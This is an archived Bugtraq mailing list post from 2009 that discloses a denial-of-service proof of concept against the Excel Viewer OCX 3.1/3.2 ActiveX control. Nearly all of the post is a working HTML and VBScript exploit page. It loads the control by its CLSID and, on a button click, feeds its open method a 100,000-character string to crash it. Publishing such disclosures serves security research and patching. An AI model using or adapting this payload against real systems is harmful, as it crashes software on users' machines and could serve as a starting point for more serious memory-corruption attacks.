lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090116210117.22897.qmail@securityfocus.com> Date: 16 Jan 2009 21:01:17 -0000 From: alphanix00@...il.com To: bugtraq@...urityfocus.com Subject: Excel Viewer OCX 3.1/3.2 Denial of Service PoC <html> <title>Excel Viewer OCX 3.1/3.2 Denial of Service PoC</title> <br> Excel Viewer OCX 3.1/3.2 Denial of Service PoC</br> <br> By ALpHaNiX </br> <br> NullArea.Net</br> <br></br> <BODY> <object id=alpha classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object> <script language='vbscript'> Sub Boom on error resume next buff = String(100000, "A") alpha.open buff alpha.open buff End Sub </script> <input type=button onclick=Boom() value='BooM !'> </body> </HTML>